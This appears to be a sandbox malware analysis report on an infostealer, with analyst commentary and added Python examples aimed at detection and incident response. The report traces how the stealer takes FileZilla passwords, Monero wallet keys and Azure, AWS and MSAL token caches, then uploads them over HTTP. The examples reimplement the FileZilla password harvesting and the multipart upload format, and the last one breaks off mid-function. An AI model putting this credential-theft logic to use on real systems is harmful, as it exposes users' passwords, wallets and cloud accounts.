                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 1942843190-555421843
                            • Opcode ID: 239f1bbdf5817101e80f3d31c518eb36fa1b07cd4055e89a410662defad18a22
                            • Instruction ID: 4c29559f9543c4e6401700b3c26b0c9e84426df15143cfc08879e5291001f456
                            • Opcode Fuzzy Hash: 239f1bbdf5817101e80f3d31c518eb36fa1b07cd4055e89a410662defad18a22
                            • Instruction Fuzzy Hash: 58D17271940208ABCB04FBF0DD56EEEB379AF14302F049A64F512B7195EF70AA49CB61
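The API and string lists above belong to the FileZilla credential harvester: the function reads \AppData\Roaming\FileZilla\recentservers.xml (CreateFileA with GENERIC_READ and OPEN_EXISTING, GetFileSizeEx, LocalAlloc, ReadFile), locates <Host>, <Port>, <User> and <Pass encoding="base64"> with StrStrA rather than an XML parser, and builds its output with the lstrcat sequence browser: FileZilla, profile: null, url:, login:, password:. The Python below is an added example, not code from the report or from the sample, that reproduces that logic on a constructed recentservers.xml so an analyst can see exactly what leaves the host. Two assumptions are labelled in the code: the separator constants at 00E61770 and 00E61774 are taken to be ':' and a newline (the report shows only their addresses), and iterating over every <Server> block is the example's generalization of a routine the listing shows walking the four markers once.

```python
import base64
from typing import Dict, List, Optional

# Constructed sample of %APPDATA%\FileZilla\recentservers.xml; not taken from the analysed host.
SAMPLE_RECENTSERVERS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.internal.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>backup</User>
      <Pass encoding="base64">Y29ycmVjdCBob3JzZQ==</Pass>
      <Logontype>1</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""

def value_after(blob: str, marker: str) -> Optional[str]:
    """StrStrA-style extraction: locate the marker, return the text up to the next '<'.
    Returns None when the marker is absent or the value is not terminated."""
    i = blob.find(marker)
    if i < 0:
        return None
    start = i + len(marker)
    end = blob.find("<", start)
    return blob[start:end] if end >= 0 else None

def parse_filezilla_servers(xml_text: str) -> List[Dict[str, str]]:
    """Harvest every <Server> block with substring search only, as the sampled function does.
    Looping over all servers is the example's generalization; the listing shows one pass."""
    records = []
    for block in xml_text.split("<Server>")[1:]:
        host = value_after(block, "<Host>")
        if host is None:
            continue
        encoded = value_after(block, '<Pass encoding="base64">')
        try:
            password = base64.b64decode(encoded, validate=True).decode("utf-8", "replace") if encoded else ""
        except ValueError:
            password = ""   # malformed base64: the case where CryptStringToBinaryA would fail
        records.append({
            "host": host,
            "port": value_after(block, "<Port>") or "",
            "user": value_after(block, "<User>") or "",
            "password": password,
        })
    return records

def format_record(rec: Dict[str, str]) -> str:
    """Reproduce the lstrcat sequence from the listing. The separators at 00E61770/00E61774
    are assumed to be ':' and a newline; the report shows only their addresses."""
    return (
        "browser: FileZilla\n"
        "profile: null\n"
        f"url: {rec['host']}:{rec['port']}\n"
        f"login: {rec['user']}\n"
        f"password: {rec['password']}\n"
    )

if __name__ == "__main__":
    for rec in parse_filezilla_servers(SAMPLE_RECENTSERVERS_XML):
        print(format_record(rec))
```

FileZilla stores these passwords base64-encoded rather than encrypted unless a master password is configured, so a single file read recovers them in clear; a read of recentservers.xml by a process that is not FileZilla is a cheap, high-signal detection on endpoints where the client is installed.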
                            APIs
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                              • Part of subcall function 00E44800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E44889
                              • Part of subcall function 00E44800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E44899
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E45A48
                            • StrCmpCA.SHLWAPI(?,009CF3B0), ref: 00E45A63
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E45BE3
                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,009CF2D0,00000000,?,009CB020,00000000,?,00E61B4C), ref: 00E45EC1
                            • lstrlen.KERNEL32(00000000), ref: 00E45ED2
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00E45EE3
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E45EEA
                            • lstrlen.KERNEL32(00000000), ref: 00E45EFF
                            • lstrlen.KERNEL32(00000000), ref: 00E45F28
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E45F41
                            • lstrlen.KERNEL32(00000000,?,?), ref: 00E45F6B
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E45F7F
                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00E45F9C
                            • InternetCloseHandle.WININET(00000000), ref: 00E46000
                            • InternetCloseHandle.WININET(00000000), ref: 00E4600D
                            • HttpOpenRequestA.WININET(00000000,009CF2F0,?,009CE8D8,00000000,00000000,00400100,00000000), ref: 00E45C48
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                            • InternetCloseHandle.WININET(00000000), ref: 00E46017
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 874700897-2180234286
                            • Opcode ID: 174b45065b86c394c842944d91dbcf9007fd03b9681ddd9d22a51d887240f311
                            • Instruction ID: 166ee2752dc1bf5b161c447d20856d86620b3332e90e3bfde430805d1e9d9a6a
                            • Opcode Fuzzy Hash: 174b45065b86c394c842944d91dbcf9007fd03b9681ddd9d22a51d887240f311
                            • Instruction Fuzzy Hash: 49123171920118ABCB15EBA0DDA5FEEB3B9BF14701F045AA9F50672191EF702A4CCF91
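The WinINet sequence above is the exfiltration path: InternetOpenA with access type 1 (INTERNET_OPEN_TYPE_DIRECT), InternetConnectA with service 3 (INTERNET_SERVICE_HTTP), HttpOpenRequestA with flags 0x00400100 (INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE), a body assembled on a process-heap buffer through the run of lstrlen calls, HttpSendRequestA, and a 0xC7-byte InternetReadFile of the reply. The only strings the function references are a double quote and several runs of '------'. The example below assumes those are the quoting of part names and the boundary of a multipart/form-data body; that is an assumption drawn from the string set, not something this report states. It is added code, not from the sample or the report: a builder for such a body beside the analyst-side parser that recovers the parts from a captured request, with constructed content and hypothetical field names (hwid, report).

```python
import re
import secrets
from typing import Dict

def make_boundary() -> str:
    """Boundary opening with a run of dashes, the assumed role of the '------' strings in the listing."""
    return "------" + secrets.token_hex(8)

def content_type_for(boundary: str) -> str:
    return f"multipart/form-data; boundary={boundary}"

def build_upload(fields: Dict[str, str], boundary: str) -> bytes:
    """Assemble a multipart/form-data body; the quoted part names are where a '"' string gets used."""
    lines = []
    for name, value in fields.items():
        lines.append(f"--{boundary}")
        lines.append(f'Content-Disposition: form-data; name="{name}"')
        lines.append("")
        lines.append(value)
    lines.append(f"--{boundary}--")
    lines.append("")
    return "\r\n".join(lines).encode("utf-8")

def parse_upload(body: bytes, content_type: str) -> Dict[str, str]:
    """Analyst side: take the boundary from Content-Type and split a captured body into its parts."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("no multipart boundary in Content-Type")
    delimiter = b"--" + m.group(1).encode("ascii")
    fields: Dict[str, str] = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):            # closing delimiter, nothing follows
            break
        header, _, value = part.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', header)
        if name is None:
            continue
        if value.endswith(b"\r\n"):            # drop only the CRLF that precedes the next delimiter
            value = value[:-2]
        fields[name.group(1).decode("ascii")] = value.decode("utf-8", "replace")
    return fields

# Constructed exfil content; the field names are hypothetical, not recovered from the sample.
SAMPLE_FIELDS = {
    "hwid": "0123456789ABCDEF",
    "report": "browser: FileZilla\nprofile: null\nurl: ftp.example.test:21\nlogin: deploy\npassword: hunter2\n",
}

if __name__ == "__main__":
    b = make_boundary()
    body = build_upload(SAMPLE_FIELDS, b)
    print(body.decode("utf-8"))
    print(parse_upload(body, content_type_for(b)))
```

When carving a PCAP, take the boundary from the request's Content-Type header rather than guessing from the body; parse_upload keeps each part's trailing newlines except the single CRLF that belongs to the delimiter, so a record that ends in a newline (as the FileZilla format above does) survives the round trip intact.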
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                              • Part of subcall function 00E58CF0: GetSystemTime.KERNEL32(00E60E1B,009CB1A0,00E605B6,?,?,00E413F9,?,0000001A,00E60E1B,00000000,?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E58D16
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E4D083
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E4D1C7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E4D1CE
                            • lstrcat.KERNEL32(?,00000000), ref: 00E4D308
                            • lstrcat.KERNEL32(?,00E61570), ref: 00E4D317
                            • lstrcat.KERNEL32(?,00000000), ref: 00E4D32A
                            • lstrcat.KERNEL32(?,00E61574), ref: 00E4D339
                            • lstrcat.KERNEL32(?,00000000), ref: 00E4D34C
                            • lstrcat.KERNEL32(?,00E61578), ref: 00E4D35B
                            • lstrcat.KERNEL32(?,00000000), ref: 00E4D36E
                            • lstrcat.KERNEL32(?,00E6157C), ref: 00E4D37D
                            • lstrcat.KERNEL32(?,00000000), ref: 00E4D390
                            • lstrcat.KERNEL32(?,00E61580), ref: 00E4D39F
                            • lstrcat.KERNEL32(?,00000000), ref: 00E4D3B2
                            • lstrcat.KERNEL32(?,00E61584), ref: 00E4D3C1
                            • lstrcat.KERNEL32(?,00000000), ref: 00E4D3D4
                            • lstrcat.KERNEL32(?,00E61588), ref: 00E4D3E3
                              • Part of subcall function 00E5AB30: lstrlen.KERNEL32(UO,?,?,00E44F55,00E60DDF), ref: 00E5AB3B
                              • Part of subcall function 00E5AB30: lstrcpy.KERNEL32(00E60DDF,00000000), ref: 00E5AB95
                            • lstrlen.KERNEL32(?), ref: 00E4D42A
                            • lstrlen.KERNEL32(?), ref: 00E4D439
                              • Part of subcall function 00E5AD80: StrCmpCA.SHLWAPI(00000000,00E61568,00E4D2A2,00E61568,00000000), ref: 00E5AD9F
                            • DeleteFileA.KERNEL32(00000000), ref: 00E4D4B4
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                            • String ID:
                            • API String ID: 1956182324-0
                            • Opcode ID: 27fde6c79773d5dcf6302f3695dacdeb591b9c1a3062d4bb1810b00e36d82884
                            • Instruction ID: 40fb0928f17d7b33d985c2026b9adf16d59a0ff61a819afe8d615642a9a1ab1c
                            • Opcode Fuzzy Hash: 27fde6c79773d5dcf6302f3695dacdeb591b9c1a3062d4bb1810b00e36d82884
                            • Instruction Fuzzy Hash: 3BE14271950108ABCB18FBA0DD56EEEB3B9AF14302F045AB4F51776191DF31AA4CCB62
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,009CDB08,00000000,?,00E61544,00000000,?,?), ref: 00E4CB6C
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00E4CB89
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00E4CB95
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E4CBA8
                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00E4CBD9
                            • StrStrA.SHLWAPI(?,009CDB38,00E60B56), ref: 00E4CBF7
                            • StrStrA.SHLWAPI(00000000,009CDC58), ref: 00E4CC1E
                            • StrStrA.SHLWAPI(?,009CE378,00000000,?,00E61550,00000000,?,00000000,00000000,?,009C9878,00000000,?,00E6154C,00000000,?), ref: 00E4CDA2
                            • StrStrA.SHLWAPI(00000000,009CE678), ref: 00E4CDB9
                              • Part of subcall function 00E4C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E4C971
                              • Part of subcall function 00E4C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E4C97C
                            • StrStrA.SHLWAPI(?,009CE678,00000000,?,00E61554,00000000,?,00000000,009C96E8), ref: 00E4CE5A
                            • StrStrA.SHLWAPI(00000000,009C9978), ref: 00E4CE71
                              • Part of subcall function 00E4C920: lstrcat.KERNEL32(?,00E60B47), ref: 00E4CA43
                              • Part of subcall function 00E4C920: lstrcat.KERNEL32(?,00E60B4B), ref: 00E4CA57
                              • Part of subcall function 00E4C920: lstrcat.KERNEL32(?,00E60B4E), ref: 00E4CA78
                            • lstrlen.KERNEL32(00000000), ref: 00E4CF44
                            • CloseHandle.KERNEL32(00000000), ref: 00E4CF9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
• Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                            • String ID:
                            • API String ID: 3744635739-3916222277
                            • Opcode ID: bfee8fa10155121ecbe00642a83abb89a747a2d390f2f482fc00a89fb8133b1a
                            • Instruction ID: 59b68a8577b659172babada840d84729d8b1e154e769c4b9709e755619130548
                            • Opcode Fuzzy Hash: bfee8fa10155121ecbe00642a83abb89a747a2d390f2f482fc00a89fb8133b1a
                            • Instruction Fuzzy Hash: 0DE11171910108ABCB18EBA4DDA1FEEB7B9AF14301F0456A9F51673191EF306A4DCFA1
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            • RegOpenKeyExA.ADVAPI32(00000000,009CBE20,00000000,00020019,00000000,00E605BE), ref: 00E58534
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E585B6
                            • wsprintfA.USER32 ref: 00E585E9
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E5860B
                            • RegCloseKey.ADVAPI32(00000000), ref: 00E5861C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00E58629
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
• Associated: the same 15 memory dumps (00E40000 through 01571000) listed under the first function above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 3246050789-3278919252
                            • Opcode ID: e7e909033639644f257f8120c6742a50cdd1abd40d9ec79450369763fa86e605
                            • Instruction ID: d4db532b064ef40b45d21c28ffe0ddf87fe02013c15257ca96ab730ee04ef930
                            • Opcode Fuzzy Hash: e7e909033639644f257f8120c6742a50cdd1abd40d9ec79450369763fa86e605
                            • Instruction Fuzzy Hash: 07812A7191011CABDB28DB54CD91FEAB7B8BF08301F1486E9E509B6180DF706B88CFA0
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E591FC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
• Associated: the same 15 memory dumps (00E40000 through 01571000) listed under the first function above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateGlobalStream
                            • String ID: `d$`d$image/jpeg
                            • API String ID: 2244384528-3402243820
                            • Opcode ID: c8d6d2358ffcad7eb67af60672eac32f19d9f9e7ae77c3e7213c61aafa26aeb6
                            • Instruction ID: b5ac48b0ba7e9c73affe2fdba154b1ed16c4f53e53a1e40796dc00dd992c2f09
                            • Opcode Fuzzy Hash: c8d6d2358ffcad7eb67af60672eac32f19d9f9e7ae77c3e7213c61aafa26aeb6
                            • Instruction Fuzzy Hash: CC71FB75A10208EBDB18DFE4D989FEEB7B9BF48301F108558F916A7284DB34A944CB60
                            APIs
                              • Part of subcall function 00E58F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E58F9B
                            • lstrcat.KERNEL32(?,00000000), ref: 00E55000
                            • lstrcat.KERNEL32(?,\.azure\), ref: 00E5501D
                              • Part of subcall function 00E54B60: wsprintfA.USER32 ref: 00E54B7C
                              • Part of subcall function 00E54B60: FindFirstFileA.KERNEL32(?,?), ref: 00E54B93
                            • lstrcat.KERNEL32(?,00000000), ref: 00E5508C
                            • lstrcat.KERNEL32(?,\.aws\), ref: 00E550A9
                              • Part of subcall function 00E54B60: StrCmpCA.SHLWAPI(?,00E60FC4), ref: 00E54BC1
                              • Part of subcall function 00E54B60: StrCmpCA.SHLWAPI(?,00E60FC8), ref: 00E54BD7
                              • Part of subcall function 00E54B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00E54DCD
                              • Part of subcall function 00E54B60: FindClose.KERNEL32(000000FF), ref: 00E54DE2
                            • lstrcat.KERNEL32(?,00000000), ref: 00E55118
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00E55135
                              • Part of subcall function 00E54B60: wsprintfA.USER32 ref: 00E54C00
                              • Part of subcall function 00E54B60: StrCmpCA.SHLWAPI(?,00E608D3), ref: 00E54C15
                              • Part of subcall function 00E54B60: wsprintfA.USER32 ref: 00E54C32
                              • Part of subcall function 00E54B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00E54C6E
                              • Part of subcall function 00E54B60: lstrcat.KERNEL32(?,009CF320), ref: 00E54C9A
                              • Part of subcall function 00E54B60: lstrcat.KERNEL32(?,00E60FE0), ref: 00E54CAC
                              • Part of subcall function 00E54B60: lstrcat.KERNEL32(?,?), ref: 00E54CC0
                              • Part of subcall function 00E54B60: lstrcat.KERNEL32(?,00E60FE4), ref: 00E54CD2
                              • Part of subcall function 00E54B60: lstrcat.KERNEL32(?,?), ref: 00E54CE6
                              • Part of subcall function 00E54B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00E54CFC
                              • Part of subcall function 00E54B60: DeleteFileA.KERNEL32(?), ref: 00E54D81
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
• Associated: the same 15 memory dumps (00E40000 through 01571000) listed under the first function above
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 949356159-974132213
                            • Opcode ID: 1fc7d27f7c74bab5bbec5fcc8e97c8e4e7fa12582663a9c8f12923e2f498d19c
                            • Instruction ID: 53fae3f87a1b1dd2e6c85a98bdff00ddcc1cb0d914574ed24869df546b41667a
                            • Opcode Fuzzy Hash: 1fc7d27f7c74bab5bbec5fcc8e97c8e4e7fa12582663a9c8f12923e2f498d19c
                            • Instruction Fuzzy Hash: 4041D3BAA8030867DB64E770EC47FDD73385B64741F0059A4B689B20C1EEB457CC8B92
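The function above builds `<folder>\.azure\`, `<folder>\.aws\` and `<folder>\.IdentityService\`, walks each with FindFirstFileA/FindNextFileA and `*.*`, and CopyFileA's every match into the collection directory; `msal.cache` is the MSAL token cache under `.IdentityService`. Added example, not part of the Joe Sandbox output and not the sample's code: an incident-response inventory of the same directories so a responder knows which cloud credentials left the host and what to revoke. CSIDL 0x1C passed to SHGetFolderPathA is CSIDL_LOCAL_APPDATA, where `.IdentityService` lives; that `.azure` and `.aws` are resolved under the profile directory is an assumption taken from where the Azure and AWS CLIs write them, since the report shows only the appended suffixes. The directory tree the example runs on is constructed in a temp dir.

```python
"""Added example: inventory of the cloud-identity artefacts the sample copies.
Not code from the report; the demo tree and file contents are constructed."""
import os
import tempfile
from pathlib import Path

# (environment root, directory the sample appends). Assumption: .azure and .aws
# sit under %USERPROFILE%, .IdentityService under %LOCALAPPDATA% (CSIDL 0x1C).
TARGET_DIRS = [
    ("USERPROFILE", ".azure"),
    ("USERPROFILE", ".aws"),
    ("LOCALAPPDATA", ".IdentityService"),
]

# Response action once a file from that directory is known to have been exfiltrated.
RESPONSE = {
    ".azure": "Azure CLI profile/token cache: revoke the user's Entra ID refresh tokens, sign out of az",
    ".aws": "AWS CLI credentials and SSO cache: deactivate and rotate access keys, audit CloudTrail",
    ".IdentityService": "MSAL token cache (Office, Visual Studio, Azure tooling): revoke refresh tokens",
}


def inventory(roots: dict[str, Path]) -> list[dict]:
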